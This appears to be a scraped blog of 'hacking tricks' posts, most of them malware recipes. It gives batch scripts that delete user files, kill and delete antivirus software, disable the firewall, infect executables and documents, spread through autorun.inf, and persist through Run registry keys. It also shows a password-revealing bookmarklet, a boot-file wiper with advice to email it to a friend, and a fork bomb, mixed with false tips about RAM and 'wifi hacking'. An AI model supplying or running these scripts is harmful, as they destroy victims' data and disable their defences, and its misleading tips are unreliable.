INCREASE YOUR RAM AND SO SYSTEM SPEED:-
1). Start any application, say Word. Open some large documents.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now switch to Word and simply minimize it. (Don’t use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.
In any multitasking system, minimizing an application means that it won’t be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.
03:01
Repair your Crupt Window Xp
Files without Software or Xp
Disk.
If your Computer has some crypt files
and want to repair it without disk or
Software. Just Follow these steps
Go to Start >> Run
Then type webfldrs.msi and press Enter
New Window Box will appear Then Click
on reinstall button
After Installation Click on Ok and then
press Yes button to Restart your
computer but If you want to restart
Later then press No
02:55
How to read hidden passwords in login pages :-
You might have seen that the password you enter will be displayed as *s or as Dots in almost all log in pages on internet. This is because, the designers who design the log in screens will make the text inside the password field hidden or made them displayed as Stars (*) or as Dots.This is just to make the password unreadable by others while the account admin try to log in to his account.
But here is a trick to read the hidden password of the admin inside password field of a Log in page or even any other pages. This trick is based on a java script which extracts the password from the password field and will display it in a dialog box as plain text.
To read the password inside the password field in text format enter this into the empty address bar of the log in page and press enter. Make sure that you have a log in page with any password entered in password field.
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k < w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i < f.length;i++) {var e=f[i].elements;for(var j=0;j < e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}
02:47
Block Google.
Code:
@echo off
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
::---------------------------::
Block Hotmail.
Code:
@echo off
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 www.hotmail.com >> "Hosts"
::---------------------------::
Block MSN.
Code:
@echo off
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 www.msn.com >> "Hosts"
::---------------------------::
Block wikipedia.
Code:
@echo off
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 wikipedia.org >> "Hosts"
echo 127.0.0.1 www.wikipedia.org >> "Hosts"
::---------------------------::
Change time to 00:00.
Code:
::__---Virus Created By Virus Author---__::
@echo off
::------Change The Time------::
time 00:00
::---------------------------::
Change user pass.
Code:
@echo off
::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::
Create account OWNED.
Code:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::
Delete all docs.
Code:
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::
Delete all music.
Code:
@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::
Delete all pics.
Code:
@echo off
::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::
Disable Firewall.
Code:
@echo off
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
Disable Internet.
Code:
@echo off
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::
Disable Keyboard.
Code:
@echo off
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::
Infect all Bat.
Code:
@echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
)
Del /f /s /q DirPath
::---------------------------::
Infect all docs.
Code:
@echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
)
Del /f /s /q DirPath
::---------------------------::
Infect all Drivers.
Code:
@echo off
::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
::---------------------------::
Infect all .exe files.
Code:
@echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
::---------------------------::
Open disk.
Code:
@echo off
::-------Open Disk Tray------::
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
::---------------------------::
Spam /C Drive.
Code:
@echo off
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::
Kill Anti-virus.
Code:
@echo off
::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
::---------------------------::
Infect all HTML.
Code:
@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
)
Del /f /s /q DirPath
::---------------------------::
Hide MUSIC folder.
Code:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::
Startup XP song
Code:
@echo off
::--Start Hidden WinXP Song--::
cd "C:\Windows\system32\oobe\images"
start title.wma
::---------------------------::
Infect CMD.
Code:
@echo off
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::---------------------------:
02:39
How to hack wifi?
step one
Go to command prompt, click start up menu on your system, click RUN, type Cmd, and click ok to open the command prompt
step two
inside the command prompt, type the following
netsh wlan show networks
mode = bssid(it will show all the available wifi network, take note of the names)
step 3
To connect to the wifi network, type the following
netsh wlan connect
name= (put the name of wifi your system detect)
e.g net wlan connect
name = (kinibigdeal pc)
step 4
press enter to connect
step 5
To disconnect it, type
netsh wlan disconnect
step 6
To save it type : netsh wlan export profile name = kinibigdeal( not by name but change it to the name of the detected wifi)
Go to command prompt, click start up menu on your system, click RUN, type Cmd, and click ok to open the command prompt
step two
inside the command prompt, type the following
netsh wlan show networks
mode = bssid(it will show all the available wifi network, take note of the names)
step 3
To connect to the wifi network, type the following
netsh wlan connect
name= (put the name of wifi your system detect)
e.g net wlan connect
name = (kinibigdeal pc)
step 4
press enter to connect
step 5
To disconnect it, type
netsh wlan disconnect
step 6
To save it type : netsh wlan export profile name = kinibigdeal( not by name but change it to the name of the detected wifi)
22:37
Text becomes unreadable
1. Open Notepad
2. On the very first line, type in "dont eat the donut" (without quotes) then save and close the file. Note: the file should have only one line of the text above.
3. Now, open the same file. You'll notice the text becomes unreadable squares. (try this with different text with the same format and length).
20:50
TEST YOUR ANTI VIRUS
check your antivirus [2] ...
copy this code in notpad and save it as .exe file...
As soon as u saved your antivirus find and delete it.If not then change your anti virus....
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
save it as viruscheck.exe
this is not harmful...
20:36
The most awesome sites
Animoto.com is a web application that produces professional quality videos from your pictures and music.
Bitstrips is a website that allows you to create comics and cartoons. There is a premium school version.
Camstudio is a free desktop application that allows you to record your computer screen. Dabbleboard is an online whiteboard that will help you visualize, explore and communicate ideas
Embedit.in is a service that allows you to upload and embed documents into blogs or other websites quickly and easily. Perfect for a classroom blog or a teacher-blogger.
Filezilla is a very useful desktop application that allows you upload content to your web pages or blogs using FTP (File Transfer protocol).
Greenfoot allows you to make graphical representation of objects and simulations.
Hot Potatoes is an application that allows you to create interactive exercises, such as quizzes, multiple choice questions and crosswords, which can be added to websites. Free for schools.
ImageChef is a website that allows you to create custom images by combining text, symbols and photos. Great for classroom displays, starter activities or homework.
Jamglue is a web based application for recording and mixing tracks. Like Audacity or Garageband but online.
Khan Academy has a library of almost 3000 education videos from a wide variety of subjects.
Lingt is a web application that allows you to create and edit language assignments incorporating voice, video, images, and text.
Mindomo is a web application for creating and sharing mind-maps.
Ning allows you to create your own public or, importantly for education, private social networks. Use it to communicate and share resources with your colleagues and students. Unfortunately, no longer free but still worth considering.
OneTrueMedia.com produces slide shows from templates with your own photos and music which you can then post online.
PDFCreator is a desktop application that turns anything in your computer (Windows only, I think) into a PDF file, be it word documents, PowerPoint presentations, web pages… anything. Very good if you want to create hand-outs or lesson notes quickly and easily.
Quizlet allows you to create and share flaschcards. Great to help your students revise material or for you to create resources for the Interactive Whiteboard.
Random Activity Generator allows you to generate a creative classroom activity, homework or task instantly.
Save Skelly is a flash game generator that allows you to create interactive assessments which can be uploaded to a website or stored in your computer as a .swf file. Great for Interactive Whiteboards.
TeacherTube. Name says it all: like YouTube but for educational purposes.
Ubuntu is an Open Source, Linux-based operating system. It contains all the applications you need – a web browser, presentation, document and spreadsheet software, instant messaging and much more.
Voki.com is a web application that produces animated characters to which you can add your voice (or anybody else’s).
Wetpaint allows you can create websites that mix all the best features of wikis, blogs, forums and social networks into a rich, user-generated space.
Xmind is an Open Source mind mapping desktop application.
Yacapaca allows you to create quizzes, test, surveys and e-portfolios. It’s an online Virtual learning Environment.
Zamzar Convert file format to any other file format and download YouTube videos.
02:07
log on to window without password
How to log Into XP without password :-
1) start computer
2) when it asks for password press ctrl+alt+delete keys twice
3) now another window opens asking for password.
4) in this at the place of user name just type administrator....leave the password feild blank and hit enter 5)wow u have logged in as a normal user
subscribe me
02:00
Want to destroy your enemy computer.....
Shut Down A Computer Forever...
This is to create a virus that will shutdown the computer forever. And this tutorial is only for educational purposes.
Please donot use it in your computer....
Open notepad and copy/paste this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Now save this as (anything).bat .
Please don't double click this file in your computer.
This file shut down the computer. It shuts the computer off and deletes the files required to reboot and restart.
send it in a mail...as soon as your frignd download this file his or her computer is affected....
follow me ...
This is to create a virus that will shutdown the computer forever. And this tutorial is only for educational purposes.
Please donot use it in your computer....
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Now save this as (anything).bat .
Please don't double click this file in your computer.
This file shut down the computer. It shuts the computer off and deletes the files required to reboot and restart.
send it in a mail...as soon as your frignd download this file his or her computer is affected....
This file shut down the computer. It shuts the computer off and deletes the files required to reboot and restart.
send it in a mail...as soon as your frignd download this file his or her computer is affected....
follow me ...
01:50
Want fb hacking tips then subscribe me and comment your email id.......
for any question related comment ur questions...
good luck ....
go and hack...!!!
hacker-snacker----
07:46
AUTO TYPER VIRUS
Step:- Open notepad.And Copy paste below code
Set wshshell = wscript.CreateObject("WScript.Shell")
do
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "H"wscript.sleep 100wshshell.sendkeys "i"wscript.sleep 120wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "b"wscript.sleep 200wshshell.sendkeys "u"wscript.sleep 140wshshell.sendkeys "d"wscript.sleep 100wshshell.sendkeys "d"wscript.sleep 140wshshell.sendkeys "y"wscript.sleep 140wshshell.sendkeys " "wscript.sleep 200wshshell.sendkeys "{ENTER}"wscript.sleep 140wshshell.sendkeys "Y"wscript.sleep 100wshshell.sendkeys "o"wscript.sleep 140 wshshell.sendkeys "u"wscript.sleep 100wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "a"wscript.sleep 140wshshell.sendkeys "r"wscript.sleep 200wshshell.sendkeys "e"wscript.sleep 140wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "J"wscript.sleep 100wshshell.sendkeys "u"wscript.sleep 140wshshell.sendkeys "s"wscript.sleep 140wshshell.sendkeys "t"wscript.sleep 120wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "H"wscript.sleep 150wshshell.sendkeys "a"wscript.sleep 170wshshell.sendkeys "c"wscript.sleep 200wshshell.sendkeys "k"wscript.sleep 120wshshell.sendkeys "e"wscript.sleep 50wshshell.sendkeys "d"wscript.sleep 120wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "ha"wscript.sleep 200wshshell.sendkeys "ha"wscript.sleep 100wshshell.sendkeys "ha"wscript.sleep 100wshshell.sendkeys "..."wscript.sleep 200wshshell.sendkeys " "wscript.sleep 120wscript.sleep 120wshshell.sendkeys "@"wscript.sleep 120wshshell.sendkeys "E"wscript.sleep 80wshshell.sendkeys "H"wscript.sleep 80wshshell.sendkeys "a"wscript.sleep 80wshshell.sendkeys "c"wscript.sleep 80wshshell.sendkeys "kk"wscript.sleep 80wshshell.sendkeys "zZz"loop Step3: Now save this Files as “Anything.vbs” ExplanationsSet objShell = WScript.CreateObject("WScript.Shell")The WshShell object enables your script to automate tasks in a number of categories related to the Windows shell.(i.e.,Running Programs,Sending Keystrokes to an Application,Working with Shortcuts etc )wshshell.sendkeys "{ENTER}"
Send one or more keystrokes to the active window as if they were typed at the keyboard.you can find Send-keys Representations of Common Keys here on the official site of Microsoft
wscript.sleep 100 or wscript.sleep 200
Suspend the execution of the current script for the specified number of milliseconds.
How to Stop this Auto Typer Virus process
Step1:-Start Windows Task Manager by pressing CTRL+ALT+DELETE key combination or right click on the windows task-bar then click on Start Task
Set wshshell = wscript.CreateObject("WScript.Shell")
do
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "H"wscript.sleep 100wshshell.sendkeys "i"wscript.sleep 120wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "b"wscript.sleep 200wshshell.sendkeys "u"wscript.sleep 140wshshell.sendkeys "d"wscript.sleep 100wshshell.sendkeys "d"wscript.sleep 140wshshell.sendkeys "y"wscript.sleep 140wshshell.sendkeys " "wscript.sleep 200wshshell.sendkeys "{ENTER}"wscript.sleep 140wshshell.sendkeys "Y"wscript.sleep 100wshshell.sendkeys "o"wscript.sleep 140 wshshell.sendkeys "u"wscript.sleep 100wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "a"wscript.sleep 140wshshell.sendkeys "r"wscript.sleep 200wshshell.sendkeys "e"wscript.sleep 140wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "J"wscript.sleep 100wshshell.sendkeys "u"wscript.sleep 140wshshell.sendkeys "s"wscript.sleep 140wshshell.sendkeys "t"wscript.sleep 120wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "H"wscript.sleep 150wshshell.sendkeys "a"wscript.sleep 170wshshell.sendkeys "c"wscript.sleep 200wshshell.sendkeys "k"wscript.sleep 120wshshell.sendkeys "e"wscript.sleep 50wshshell.sendkeys "d"wscript.sleep 120wshshell.sendkeys " "wscript.sleep 100wshshell.sendkeys "ha"wscript.sleep 200wshshell.sendkeys "ha"wscript.sleep 100wshshell.sendkeys "ha"wscript.sleep 100wshshell.sendkeys "..."wscript.sleep 200wshshell.sendkeys " "wscript.sleep 120wscript.sleep 120wshshell.sendkeys "@"wscript.sleep 120wshshell.sendkeys "E"wscript.sleep 80wshshell.sendkeys "H"wscript.sleep 80wshshell.sendkeys "a"wscript.sleep 80wshshell.sendkeys "c"wscript.sleep 80wshshell.sendkeys "kk"wscript.sleep 80wshshell.sendkeys "zZz"loop Step3: Now save this Files as “Anything.vbs” ExplanationsSet objShell = WScript.CreateObject("WScript.Shell")The WshShell object enables your script to automate tasks in a number of categories related to the Windows shell.(i.e.,Running Programs,Sending Keystrokes to an Application,Working with Shortcuts etc )wshshell.sendkeys "{ENTER}"
Send one or more keystrokes to the active window as if they were typed at the keyboard.you can find Send-keys Representations of Common Keys here on the official site of Microsoft
wscript.sleep 100 or wscript.sleep 200
Suspend the execution of the current script for the specified number of milliseconds.
How to Stop this Auto Typer Virus process
Step1:-Start Windows Task Manager by pressing CTRL+ALT+DELETE key combination or right click on the windows task-bar then click on Start Task Manager and kill the process that says WScript & cscript
07:17
HOW TO CREATE A VIRUS .... SIMPLE
Batch virus is simply made using notepad/notepad++ there is no need for any special program that you need in order for you to make one.Batch file is a command that is executed by the computer line by line (just like C or java, etc.), but batch language is easier to understand than C. Batch is very fast, lets say that you made a batch virus that infects files..It can infect a thousand files in just 5 seconds.
INDEX:
- echo,message review
- memory dump virus
- force shutdown
- file infecting
- file moving
- file copying
- file deleting
- file hiding
- task killing virus
- launch virus every startup
- swap left click and right click mouse buttons
- disabling system restore
- disabling task manager
- disabling folder options
- disabling run
- disabling right click on desktop
So let's begin by constructing a batch file, this is not a virus yet, it will just print a message.
@echo off
echo "im a virus programmer"
pause
type this code on your notepad then save it as .bat extension then launch it on your computer.
@echo off - this will not display the directory.
echo - use to print strings.
pause - waits for the user to press any key before exiting.
now another way of displaying a message is this:
@echo off
msg * im a virus programmer
this will show an alert.
msg * - used to display an alert message.
--------------------------------------------------------------------------------------------------------------
So first lets begin by constructing a batch file that will dump your memory, causing you computer to crash
@echo off
:a
start %0
goto :a
this will loop and loop infinitely, opening a bunch of command prompts, this will cause a memory dump,your computer will surely slow down. The only solution for this memory dump is to restart your computer using the power button,restart button on your system unit.
now lets make a batch file that forcely shutdown a computer:
@echo off
shutdown -s -f -t 30 -c "your owned!"
shutdown - a command use to begin with a shutdown execution.
-s - means shutdown the computer, you can also use -r - this will restart he computer.
-f - forcely terminates running program.
-t - use to set time
30 - number of seconds before shutdown
-c - comment
now lets create a virus that infects file.
@echo off
ren "C:\windows\notepad.exe" "infected.exe"
or
ren "C:\windows\*.exe" "*.bat"
this will change the working notepad.exe to a crappy file infected.exe.
ren - rename, use rename files
"C:\windows\notepad.exe" - the directory of the file that you want to infect.
"infected.exe" - the name of the file that you want to be replaced to the original file.
task killing batch file
@echo off
taskkill /f /im explorer.exe
this will forcely terminate running program on your system.
taskkill - use to terminate a process
/f - forcely termination of the process
im - this specifies the image name, specifies a process.
explorer.exe - the image, the process that you wanted to terminate.
now let's make a batch file that delete files
@echo off
del "C:\windows\notepad.exe" /q
del - the command for deleting files, you can also use 'erase' or 'delete', del is the shortcut for delete
/q - means dont prompt user,silent mode,just delete the file.
c:\windows\notepad.exe - the directory of the file,notepad .exe is the file that we want to delete
moving files - this will move file/s to one place to another
@echo off
move /y file.bat "C:\windows\system32"
move - the command for moving file/s
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
copying file/s
@echo off
copy /y file.bat "c:\windows\system32"
copy - command for copying file/s
/y - if the file already exist, don't prompt the user if he want to overwrite
C:\windows\system32 - destination
hiding files - this is use of you want to apply hide attribute to a certain file/s
@echo off
attrib +h "c:\windows\notepad.exe"
attrib - attribute
+h - use to hide a file, -h if you want to unhide a file
c:\windows\notepad.exe - the destination of the file we want to hide,notepad.exe is the target file
-------------------------------------------------------------------------------------------------------------
Now let's make a batch file that always launch when windows starts(i love it)
now there are two ways on how will you make your batch file runs at start up, one is creating a registry key, and two is copying the file at startup folder then hiding it so that it will not appear when the user checks the startup folder.
now lets create a registry key that will launch your batch file on start up
@echo off
copy file.bat "C:\windows\system32"
attrib +h "C:\windows\system32\file.bat"
reg add hklm\software\microsoft\windows\currentversion\run /v filedotbat /t reg_sz /d C:\windows\system32\file.bat /f
now this will first copy it self on system32 folder,hide it self then it will make a registry key that will make it start during windows start up.
/v - use to specify a file name
/t - type of registry key
/d - the destination of the file
/f - force to create a registry key
another way is copying the file on the startup folder,this is easier
@echo off
copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup"
attrib +h copy file.bat "C:\Documents and Settings\%userprofile%\Start Menu\Programs\startup\file.bat"
now let's create a batch file that will switch right click and left click
@echo off
rundll32 user32.dll, SwapMouseButton
--------------------------------------------------------------------------------------------------------------
now lets create batch file that will disable vital functions of the system
DISABLING TASKMANAGER
@echo off
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
DISABLING SYSTEM RESTORE
@echo off
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f
DISABLING FOLDER OPTIONS
@echo off
REG add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v NoFolderOptions /t REG_DWORD /d 1 /f
DISABLING RUN
@echo off
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
DISABLING RIGHT CLICK ON DESKTOP
@echo off
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
--------------------------------------------------------------------------------------------------------------
a good virus must work even if the operating system is installed on other drive, because the common drive that is OS is installed is on drive C, so in case the OS is installed in D,E,F,G,H...Z, will your virus work?
of course in some cases your virus will not work unless your codes are specified for a certain drive.
example:
@echo off
del "C:\windows\system32\hal.dll" /q
now your batch file will search for the file called hal.dll, but first it needs to pass roads,highways..but what will happen if the roads are changed and the highways are also change? the batch file will be confused and will be lost in no where, so to solve this problem we use the '%systemdrive%' - this is a substitute for system drives, in case we do not know where is the operating system is installed,so the code for this would be:
@echo off
